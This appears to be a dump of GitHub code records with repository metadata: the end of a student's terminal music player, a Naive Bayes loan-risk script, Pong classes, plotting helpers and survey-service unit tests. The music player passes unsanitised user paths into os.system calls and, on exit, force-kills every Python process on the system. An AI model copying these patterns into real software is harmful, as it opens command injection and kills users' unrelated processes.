','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_plus:#listen for seek song keys\n if 1:\n try:\n mp3_player.forward(3) \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT SEEK SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_minus:#listen for rewind song keys\n if 1:\n try:\n mp3_player.rewind(3) \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT REWIND SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n else:\n current.add(key)\n except:\n pass\n\n\ndef menu_dir(name):#print key to use and song data for folder player\n\n if 1:\n m1 = \"\"\"\n\n KEY TO USE THE MUSIC PLAYER\n\n PLAY NEXT SONG -> PRESS CTRL+ALT+RIGHT ARROW\n PLAY PREVIOUS SONG -> PRESS CTRL+ALT+LEFT ARROW\n PAUSE CURRENT SONG -> PRESS 
CTRL+ALT+SPACE\n PLAY CURRENT SONG -> PRESS CTRL+ALT+SPACE\n SHUFFLE PLAYLIST -> PRESS CTRL+ALT+S\n INCREASE VOLUME -> PRESS CTRL+ALT+UP ARROW\n DECREASE VOLUME -> PRESS CTRL+ALT+DOWN ARROW\n FORWARD CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+PLUS\n REWIND CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+MINUS\n ADD CURRENT SONG TO PERSONAL PLAYLIST -> PRESS CTRL+ALT+A\n QUIT TO MAIN MENU -> PRESS CTRL+ALT+Q\n\n \"\"\"\n if name:\n m1 += '\\n\\n\\n\\n[-] NOW PLAYING '+base_name(name)+'\\n\\n' \n return colored(m1,'green',attrs=['bold'])\n\ndef single(name):#print key to use and song data for single track\n\n if 1:\n m1 = \"\"\"\n\n KEY TO USE THE MUSIC PLAYER\n\n PAUSE CURRENT SONG -> PRESS CTRL+ALT+ENTER\n PLAY CURRENT SONG -> PRESS CTRL+ALT+ENTER\n INCREASE VOLUME -> PRESS CTRL+ALT+UP ARROW\n DECREASE VOLUME -> PRESS CTRL+ALT+DOWN ARROW\n FORWARD CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+PLUS\n REWIND CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+MINUS\n PLAY CURRENT SONG IN REPEAT -> PRESS CTRL+ALT+R OR\n ADD CURRENT SONG TO PERSONAL PLAYLIST -> PRESS CTRL+ALT+A OR\n QUIT TO MAIN MENU -> PRESS CTRL+ALT+Q OR\n\n \"\"\"\n if name:\n m1 += '\\n\\n\\n\\n[-] NOW PLAYING '+base_name(name)+'\\n\\n' \n return colored(m1,'green',attrs=['bold'])\n \ndef play_next():#play next song\n\n global type_music\n global kill_thread\n global s_name\n global repeat_var\n global progress\n\n if not playlist and type_music == \"dir\":\n kill_thread = 0\n mp3_player.stop()\n return\n if type_music == \"dir\":\n played.append(playlist.pop(0))\n mp3_player.play_song(played[-1])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print(menu_dir(played[-1]))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n elif type_music == \"single\":\n mp3_player.play_song(s_name)\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print(single(s_name))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n\ndef play_prev():#play previous song\n\n global progress\n\n playlist.insert(0,played.pop(-1))\n mp3_player.play_song(played[-1])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n if 1:\n print(menu_dir(played[-1]))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n\ndef add_to():#add song to personal playlist\n\n if type_music == \"dir\" and base_name(played[-1]) not in os.listdir(per_folder):\n shutil.copyfile(played[-1],per_folder+'/'+base_name(played[-1]))\n elif type_music == \"single\" and base_name(s_name) not in os.listdir(per_folder):\n shutil.copyfile(s_name,per_folder+'/'+base_name(s_name))\n else:\n print()\n pri = colored('[-] SONG ALREADY EXISTS IN PLAYLIST','red',attrs=['bold'])\n print(pri)\n return\n pri = colored('[-] ADDED CURRENT SONG TO PERSONAL PLAYLIST ','green',attrs=['bold'])\n print('\\n')\n print(pri)\n\ndef on_release(key):#on_release function for keylistener\n \n try:\n current.remove(key)\n except KeyError:\n pass\n\ndef main1():#listener function for keys from keyboard\n\n global kill_thread\n while kill_thread:\n with keyboard.Listener(on_press=on_press,on_release=on_release) as listener:\n listener.join()\n\ndef not_play():#check if media is playing\n\n global mp3_player\n sleep(5)\n return not mp3_player.has_media()\n\ndef main2():#autoplay function for folder player\n\n global kill_thread\n\n play_next()\n while 
kill_thread or mp3_player.has_media():\n        if playlist:\n            if mp3_player.has_media():\n                if round(mp3_player.get_pos(),0) != round(mp3_player.get_length(),0):\n                    printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n                    continue\n                if not_play() or round(mp3_player.get_pos(),0) == round(mp3_player.get_length(),0):\n                    play_next()\n            else:\n                while progress:\n                    printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n        else:\n            break\n\ndef main4():#autoplay function for single track player\n\n    global kill_thread\n    global repeat_var\n\n    play_next()\n    while kill_thread:\n        if mp3_player.has_media():\n            if round(mp3_player.get_pos(),0) != round(mp3_player.get_length(),0):\n                printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n                continue\n            elif repeat_var:\n                mp3_player.set_pos(0)\n            else:\n                kill_thread = 0\n        if not kill_thread:\n            return\n        if repeat_var:\n            try:\n                mp3_player.set_pos(0)\n                continue\n            except:\n                if os.name == \"nt\":\n                    os.system('cls')\n                else:\n                    os.system('clear')\n                print()\n                pri = colored('[-] SONG HAS BEEN MOVED TO DIFFERENT PATH','red',attrs=['bold'])\n                print(pri)\n                kill_thread = 0\n                break\n        break\n\ndef dir_music(folder,choice):#driver function for playing all songs from a folder\n\n    global mp3_player\n    global type_music\n    global playlist\n    global played\n    global per_folder\n    global kill_thread\n    global s_name\n    global repeat_var\n    global progress\n\n    mp3_player = player()\n    playlist = get_songs(folder,choice)\n    if not playlist:\n        return 0\n    t2 = Thread(target = main2)\n    t2.daemon = True#assigning to setDaemon would shadow the Thread method; use the daemon attribute\n    t2.start()#thread to keep autoplay and manual control running side by side\n    while 1:#keep checking for kill_thread var\n        if not kill_thread:\n            playlist = []\n            progress = 0\n            if os.name == \"nt\":\n                os.system('cls')\n            else:\n                os.system('clear')\n            return 1\n\ndef single_music():#driver function for playing a single song\n\n    global mp3_player\n    global type_music\n    global playlist\n    global played\n    global per_folder\n    global kill_thread\n    global s_name\n    global repeat_var\n    global progress\n\n    mp3_player = player()\n    t2 = Thread(target = main4)\n    t2.daemon = True\n    t2.start()#thread to keep autoplay and manual control running side by side\n    sleep(1)\n    while 1:#keep checking for kill_thread var\n        if not kill_thread:\n            progress = 0\n            if os.name == \"nt\":\n                os.system('cls')\n            else:\n                os.system('clear')\n            return\n\ndef add_per(folder):#add song(s) to personal playlist\n\n    while 1:\n        try:\n            print()\n            inp = colored('[-] ENTER FULL PATH TO SONG(S) SEPARATED BY COMMAS IF MANY ','green',attrs=['bold'])\n            filez = input(inp)\n        except:\n            print()\n            pri = colored('[-] INVALID PATH','red',attrs=['bold'])\n            print(pri)\n            continue\n        file_list = filez.split(',')\n        #keep only entries with a supported audio extension that actually exist on disk\n        check = [a for a in file_list if (a[-3:] in (\"mp3\", \"wav\", \"ogg\") or a[-4:] == \"flac\") and os.path.isfile(a)]\n        invalid = [a for a in file_list if a not in check]\n        if invalid:#report the bad entries instead of looping over an empty list\n            for a in invalid:\n                print()\n                pri = colored('[-] INVALID SONG '+a,'red',attrs=['bold'])\n                print(pri)\n            continue\n        break\n    for a in file_list:\n        shutil.copyfile(a,per_folder+'/'+base_name(a))\n        print()\n        pri = colored('[-] ADDED '+base_name(a)+' TO PERSONAL PLAYLIST','green',attrs=['bold'])\n        print(pri)\n\ndef list_per(folder):#list all tracks in personal playlist\n\n    print()\n    m1 = \"[-] TRACKS IN PLAYLIST\\n\\n\"\n    count = 0\n    list_songs = os.listdir(folder)\n    for a in list_songs:\n        if a[-3:] == \"mp3\" or a[-3:] == \"wav\" or a[-3:] == \"ogg\" or a[-4:] == \"flac\":\n            count += 1#only number files that are actually listed\n            m1 += 
str(count)+') '+a + '\\n'\n if m1 != \"[-] TRACKS IN PLAYLIST\\n\\n\":\n pri = colored(m1,'green',attrs=['bold'])\n else:\n return 0\n print(pri)\n print('\\n\\n\\n')\n return 1\n\ndef make_archive(source, destination):#make .zip file in desired location\n\n base = base_name(destination)\n name = base.split('.')[0]\n format = base.split('.')[1]\n archive_from = os.path.dirname(source)\n archive_to = base_name(source.strip(os.sep))\n shutil.make_archive(name, format, archive_from, archive_to)\n shutil.move('%s.%s'%(name,format), destination)\n\ndef export_per(folder):#export personal playlist as .zip file in desired location\n\n while 1:\n try:\n print()\n inp = colored('[-] ENTER PATH TO EXPORT ','green',attrs=['bold'])\n folder2 = input(inp)\n if not os.path.isdir(folder):\n print('[-] PATH DOES NOT EXIST')\n continue\n pri2 = ''\n break\n except EOFError:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n if os.name == \"nt\":\n folder2 += '\\\\playlist.zip'\n else:\n folder2 += '/playlist.zip'\n try:\n make_archive(folder,folder2)\n except:\n pri2=colored('[-] COULD NOT EXPORT PLAYLIST ','red',attrs=['bold'])\n return\n if pri2:\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n print(pri2)\n return\n pri2 = colored('[-] EXPORTED PLAYLIST AS '+folder2,'green',attrs=['bold'])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n print(pri2)\n\ndef open_f(folder):#open personal playlist to view and edit\n\n if os.name == \"nt\":\n if os.path.isdir(folder):\n os.system('explorer '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n elif os.name == \"posix\":\n if os.path.isdir(folder):\n os.system('open '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n else:\n if os.path.isdir(folder):\n os.system('xdg-open '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n\ndef main_menu():#driver function\n \n global mp3_player\n global type_music\n global playlist\n global played\n global per_folder\n global kill_thread\n global s_name\n global repeat_var\n\n t1 = Thread(target = main1)\n t1.setDaemon = True\n t1.start()#thread for key listening\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n fancy_text = \"\"\"\n \n\n /$$ /$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$\n| $$$ /$$$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$ | $$__ $$ /$$__ $$| $$ / $$\n| $$$$ /$$$$| $$ | $$| $$ \\__/ | $$ | $$ \\__/ | $$ \\ $$| $$ \\ $$| $$/ $$/\n| $$ $$/$$ $$| $$ | $$| $$$$$$ | $$ | $$ | $$$$$$$ | $$ | $$ \\ $$$$/ \n| $$ $$$| $$| $$ | $$ \\____ $$ | $$ | $$ | $$__ $$| $$ | $$ >$$ $$ \n| $$\\ $ | $$| $$ | $$ /$$ \\ $$ | $$ | $$ $$ | $$ \\ $$| $$ | $$ /$$/\\ $$\n| $$ \\/ | $$| $$$$$$/| $$$$$$/ /$$$$$$| $$$$$$/ | $$$$$$$/| $$$$$$/| $$ \\ $$\n|__/ |__/ \\______/ \\______/ |______/ \\______/ |_______/ \\______/ |__/ |__/ \n v1.0\n\n A COMPUTER SCIENCE PROJECT BY ANIRUDH R OF CLASS 12 E\n\n\n\"\"\"\n menu = \"\"\"\n[-] SELECT YOUR CHOICE\n\n1) PLAY A SONG\n2) PLAY SONGS FROM A FOLDER\n3) PLAY SONGS FROM MULTIPLE FOLDERS\n4) PLAY PERSONAL PLAYLIST\n5) LIST SONGS IN PERSONAL PLAYLIST\n6) EXPORT PERSONAL PLAYLIST AS .zip FILE\n7) OPEN PERSONAL PLAYLIST TO VIEW\n8) ADD SONG(S) TO PERSONAL PLAYLIST\n9) DOWNLOAD SONGS TO PERSONAL PLAYLIST\n10) 
QUIT\n\n\"\"\"\n menu = colored(fancy_text + menu,'green',attrs=['bold'])\n while 1:\n try:\n print()\n print('\\r'*100)\n choice = str(input(menu))\n choice = choice[-2:]\n if choice.isnumeric() :\n choice = int(choice)\n else:\n choice = int(choice[-1])\n if choice not in (1,2,3,4,5,6,7,8,9,10):\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n continue \n except:\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n continue\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n if choice == 10:\n print()\n pri = colored('[-] THANK YOU FOR USING MUSIC BOX :)','green',attrs=['bold'])\n print(pri)\n return\n elif choice == 1:\n type_music = \"single\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO SONG ','green',attrs=['bold'])\n s_name = input(inp)\n s_name = parse_trailing_space(s_name)\n if not os.path.isfile(s_name):\n print()\n pri = colored('[-] FILE DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n single_music()\n elif choice == 2:\n type_music = \"dir\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO DIRECTORY CONTAINING SONGS ','green',attrs=['bold'])\n folder = input(inp)\n folder = parse_trailing_space(folder)\n if not os.path.isdir(folder):\n print()\n pri = colored('[-] PATH DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n while 1:\n try:\n inp = colored('[-] DO YOU WANT TO INCLUDE SONGS FROM SUBFOLDERS(Y/N)? ','green',attrs=['bold'])\n print()\n multi = input(inp)\n if multi.lower() not in 'yn':\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n multi = 1 if multi.lower() == 'y' else 0\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n if not dir_music([folder],multi):\n print()\n pri = colored('[-] NO SONGS IN FOLDER','red',attrs=['bold'])\n print(pri)\n elif choice == 3:\n type_music = \"dir\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO DIRECTORIES SEPERATED BY COMMAS ','green',attrs=['bold'])\n folder = input(inp).split(',')\n folder = [parse_trailing_space(a) for a in folder]\n for a in folder:\n if not os.path.isdir(a):\n print()\n pri = colored('[-] PATH'+a+'DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n while 1:\n try:\n inp = colored('[-] DO YOU WANT TO INCLUDE SONGS FROM SUBFOLDERS(Y/N)? 
','green',attrs=['bold'])\n print()\n multi = input(inp)\n if multi.lower() not in 'yn':\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n multi = 1 if multi.lower() == 'y' else 0\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n if not dir_music(folder,multi):\n print()\n pri = colored('[-] NO SONGS IN FOLDERS','red',attrs=['bold'])\n print(pri)\n elif choice == 4:\n type_music = \"dir\"\n kill_thread = 1\n if list_per(per_folder):\n dir_music([per_folder],0)\n else:\n pri = colored('[-] NO SONG(S) IN PERSONAL PLAYLIST','red',attrs=['bold'])\n print(pri)\n elif choice == 5:\n list_per(per_folder)\n elif choice == 6:\n export_per(per_folder)\n elif choice == 7:\n open_f(per_folder)\n elif choice == 8:\n add_per(per_folder)\n elif choice == 9:\n looper = 1\n while looper:\n try:\n print()\n inp = colored('[-] ENTER FULL NAME OF THE SONG ','green',attrs=['bold'])\n name = input(inp)\n if os.path.isfile(per_folder+'/'+name.lower()+'.mp3'):\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] SONG ALREADY EXISTS IN YOUR PLAYLIST')\n print(pri)\n looper = 0\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n if looper:\n downloader = down_songs(name,per_folder+'/')\n search = downloader.search()\n if search:\n if downloader.download(downloader.get_link(search)):\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] DOWNLOADED SONG TO YOUR PLAYLIST','green',attrs=['bold'])\n print(pri)\n else:\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] COULD NOT DOWNLOAD SONG TO YOUR PLAYLIST','red',attrs=['bold'])\n print(pri)\n\nif __name__ == \"__main__\":\n main_menu() \n if os.name != 'nt':#scrap all threads\n os.system('killall Python > /dev/null')\n else:#scrap all threads\n os.system('taskkill /F /IM python.exe /T')","repo_name":"Anirudh-R-2506/Music-Box","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22010383271","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\n\ndata_train = pd.read_csv('merge.csv')\ndata_test = pd.read_csv('test/test_merge.csv')\nfeatures = [f for f in data_train.columns if f not in ['cust_id','label']]\nx_train = data_train[features]\nx_test = data_test[features]\ny_train = data_train['label']\n\nclf = GaussianNB()\nclf.fit(x_train,y_train)\npredictions = clf.predict(x_test)\n\n# print(predictions)\n# label_result = pd.read_csv('label.csv')\n# # print('********************************')\n# print(f1_score(label_result['label'].values, predictions))\n\npredictions=predictions.astype('int')\ndata_test=data_test[['cust_id']]\ndata_test['label']=predictions\ndata_test.to_excel('./result.xlsx',index=False)\nprint('********************************')","repo_name":"ThinkingXuan/loan-risk-prediction","sub_path":"models/_GaussianNB.py","file_name":"_GaussianNB.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"21563816308","text":"from 
turtle import Turtle\nimport time\nimport random\n\n# create class for paddles\nclass Paddles(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('square')\n self.color('white')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n\n def move_up(self):\n if self.ycor() <= 235:\n self.sety(self.ycor() + 30)\n\n def move_down(self):\n if self.ycor() >= -225:\n self.sety(self.ycor() - 30)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('circle')\n self.color('white')\n # self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n self.speed_x = 10\n self.speed_y = 10\n\n def move(self):\n self.setx(self.xcor() + self.speed_x)\n self.sety(self.ycor() + self.speed_y)\n\n def bounce_wall(self):\n self.speed_y *= -1\n\n def bounce_paddle(self):\n self.speed_x *= -1\n if self.heading() == 180:\n self.setheading(0)\n else:\n self.setheading(180)\n\n def increase_speed(self):\n self.speed_x *= 1.05\n self.speed_y *= 1.05\n\n def ball_reset(self):\n self.home()\n if self.speed_x < 0:\n self.speed_x = 10\n else:\n self.speed_x = -10\n self.speed_y = random.choice([-10, 10])\n","repo_name":"moe221/Small-GUI-Projects","sub_path":"Pong/game_tools.py","file_name":"game_tools.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71819650754","text":"import matplotlib.pyplot as plt\n\n_figsize = (30, 15)\n\ndef plot_accuracies(accuracies_train, accuracies_val):\n\tplt.figure(figsize=_figsize)\n\tplt.rcParams.update({\"font.size\": 20})\n\n\tplt.plot(accuracies_train, color=\"green\", label=\"Train accuracy\")\n\tplt.plot(accuracies_val, color=\"blue\", label=\"Val accuracy\")\n\tplt.axhline(1, color=\"black\", label=\"1\", linestyle=\"dashed\")\n\n\tplt.legend()\n\tplt.xlabel(\"Epochs\")\n\tplt.ylabel(\"Accuracy\")\n\tplt.title(\"Accuracies\")\n\tplt.show()\n\ndef plot_losses(losses_train, losses_val):\n\tplt.figure(figsize=_figsize)\n\tplt.rcParams.update({\"font.size\": 20})\n\n\tplt.plot(losses_train, color=\"green\", label=\"Train loss\")\n\tplt.plot(losses_val, color=\"blue\", label=\"Val loss\")\n\n\tplt.legend()\n\tplt.xlabel(\"Epochs\")\n\tplt.ylabel(\"Loss\")\n\tplt.title(\"Losses\")\n\tplt.show()\n\ndef plot_mnist(loader):\n\tfig = plt.figure(figsize=_figsize)\n\trows = 2\n\tcolumns = 5\n\tposition = 1\n\n\tfor images, labels in loader:\n\t\timages = images[:10]\n\t\tfor image in images:\n\t\t\tfig.add_subplot(rows, columns, position)\n\t\t\tplt.imshow(image.permute(1, 2, 0), cmap=\"gray\")\n\t\t\tposition += 1\n\t\tbreak\n\tplt.plot()","repo_name":"Githubowy-Juliusz/SDT","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8096823583","text":"import unittest\nimport os\nfrom flask import Flask\nfrom dotenv import load_dotenv\nfrom src import db\nfrom src.services.survey_service import survey_service as ss\nfrom src.services.survey_choices_service import survey_choices_service as scs\nfrom src.repositories.user_repository import user_repository as ur\nfrom src.repositories.user_rankings_repository import user_rankings_repository as urr\nfrom src.services.survey_teachers_service import survey_teachers_service as sts\nfrom src.entities.user import User\nfrom src.tools.db_tools import clear_database\nimport datetime\nimport json\n\nclass TestSurveyService(unittest.TestCase):\n def setUp(self):\n 
load_dotenv()\n self.app = Flask(__name__)\n self.app.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\n self.app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\n db.init_app(self.app)\n\n self.app_context = self.app.app_context()\n self.app_context.push()\n\n clear_database()\n\n self.setup_users()\n # Remember to add survey choices later (Must be relevant names or tests will fail D:)\n self.edit_dict = {\n \"surveyGroupname\": \"Safest (most dangerous lmao) PED's\",\n \"surveyInformation\": \"No way in hell will these have long term affects on your body, mind and soul.\",\n \"startdate\": \"01.07.2023\",\n \"starttime\": \"00:00\",\n \"enddate\": \"31.12.2077\",\n \"endtime\": \"00:00\",\n }\n with open(\"tests/test_files/test_survey1.json\", 'r') as openfile:\n # open as JSON instead of TextIOWrapper or something\n self.json_object = json.load(openfile)\n\n def setup_users(self):\n self.ur = ur\n user1 = User(\"Not on tren Testerr\", \"feelsbadman@tester.com\", True)\n user2 = User(\"Not on anabolic\", \"anabolic@tester.com\", True)\n user3 = User(\"trt enjoyer\", \"ttrt@tester.com\", True)\n self.ur.register(user1)\n self.ur.register(user2)\n self.ur.register(user3)\n self.user_id = ur.find_by_email(user1.email)[0]\n self.user_id2 = ur.find_by_email(user2.email)[0]\n self.user_id3 = ur.find_by_email(user3.email)[0]\n self.user_email = user1.email\n\n\n def tearDown(self):\n db.drop_all()\n self.app_context.pop()\n\n def test_get_survey_name_nonexisting_id(self):\n \"\"\"\n Test that no survey name is returned for an invalid survey id\n \"\"\"\n name = ss.get_survey_name(\"ITSNOTREAL\")\n self.assertEqual(name, False)\n\n def test_elomake_csv_to_dict_parsing_case_normal(self):\n '''\n Tests that Elomake imported CSV is parsed correctly to a dict\n '''\n file = open(\"tests/test_files/test_survey1.csv\", 'r').read()\n dict = ss.create_survey_from_csv(file)\n\n choice1 = dict[\"choices\"][0]\n choice2 = dict[\"choices\"][1]\n\n self.assertEqual(choice1[\"name\"], \"Päiväkoti Toivo\")\n self.assertEqual(int(choice1[\"spaces\"]), 3)\n self.assertEqual(choice1[\"Postinumero\"], \"00790\")\n self.assertEqual(choice1[\"Lisätietoja\"], \"Tässä tekstiä, pilkulla\")\n\n self.assertEqual(choice2[\"name\"], \"Päiväkoti Gehenna\")\n self.assertEqual(int(choice2[\"spaces\"]), 6)\n self.assertEqual(choice2[\"Postinumero\"], \"00666\")\n self.assertEqual(choice2[\"Lisätietoja\"], \"Tässä tekstiä,, kahdella pilkulla\")\n\n \n def test_survey_creation_case_normal(self):\n '''\n Tests that dict is parsed correctly to survey, its choices and their additional infos\n CASE NORMAL, the dict is valid etc.\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], self.json_object[\"surveyGroupname\"], self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n # check surveys tables information\n survey_name = ss.get_survey_name(survey_id)\n survey_desc = ss.get_survey_description(survey_id)\n self.assertEqual(survey_name, \"Testikysely JSON\")\n self.assertEqual(survey_desc, \"Tällä testataan kyselyn manuaalista luomista\")\n\n # check choice mandatory informations\n choices = scs.get_list_of_survey_choices(survey_id)\n self.assertEqual(choices[0][2], \"Esimerkkipäiväkoti 1\")\n self.assertEqual(choices[0][3], 8)\n self.assertEqual(choices[1][2], \"Esimerkkipäiväkoti 2\")\n self.assertEqual(choices[1][3], 6)\n\n # check choice additional infos\n choice1_infos 
= scs.get_choice_additional_infos(choices[0][0])\n choice2_infos = scs.get_choice_additional_infos(choices[1][0])\n self.assertEqual(choice1_infos[0][0], \"Osoite\")\n self.assertEqual(choice1_infos[0][1], \"Keijukaistenpolku 14\")\n self.assertEqual(choice1_infos[1][0], \"Postinumero\")\n self.assertEqual(choice1_infos[1][1], \"00820\")\n\n self.assertEqual(choice2_infos[0][0], \"Osoite\")\n self.assertEqual(choice2_infos[0][1], \"Hattulantie 2\")\n self.assertEqual(choice2_infos[1][0], \"Postinumero\")\n self.assertEqual(choice2_infos[1][1], \"00550\")\n\n def test_count_surveys_created(self):\n '''\n Test survey service function count_surveys_created()\n UPDATE WHEN SURVEYS OF SAME NAME NO LONGER ACCEPTED\n '''\n count = ss.count_surveys_created(self.user_id)\n self.assertEqual(count, 0)\n\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 1\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n count = ss.count_surveys_created(self.user_id)\n self.assertEqual(count, 1)\n\n def test_survey_closed(self):\n '''\n Test survey service functions close_survey() and check_if_survey_closed() normal cases\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 2\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, False)\n\n ss.close_survey(survey_id, self.user_id)\n closed = ss.check_if_survey_closed(survey_id)\n self.assertEqual(closed, True)\n\n def test_close_non_existing_survey(self):\n '''\n Test survey service functions close_survey() and check_if_survey_closed() non existing cases\n doesn't differentiate between non-existing and closed, might be a problem\n '''\n ret = ss.close_survey(\"ITSNOTREAL\", self.user_id)\n self.assertEqual(ret, False)\n\n ret = ss.check_if_survey_closed(\"ITSNOTREAL\")\n self.assertEqual(ret, False)\n\n def test_wrong_teacher_cant_close_survey(self):\n '''\n Test that wrong user id can't close an survey\n '''\n survey_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 3\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(survey_id, self.user_email)\n\n ret = ss.close_survey(survey_id, self.user_id2)\n\n self.assertEqual(ret, False)\n\n def test_get_list_closed_surveys(self):\n '''\n Test only closed surveys are acquired\n '''\n closed_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 4\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(closed_id, self.user_email)\n open_id = ss.create_new_survey_manual(self.json_object[\"choices\"], \"Test survey 5\", self.user_id, self.json_object[\"surveyInformation\"], 1, \"01.01.2023\", \"01:01\", \"01.01.2024\", \"02:02\")\n sts.add_teacher_to_survey(open_id, self.user_email)\n\n ss.close_survey(closed_id, self.user_id)\n\n surveys = ss.get_list_closed_surveys(self.user_id)\n\n self.assertEqual(surveys[0][0], closed_id)\n self.assertEqual(len(surveys), 1)\n\n def test_get_list_open_surveys(self):\n '''\n Test only open surveys are acquired\n '''\n\n # first check 0 surveys branch\n surveys = 
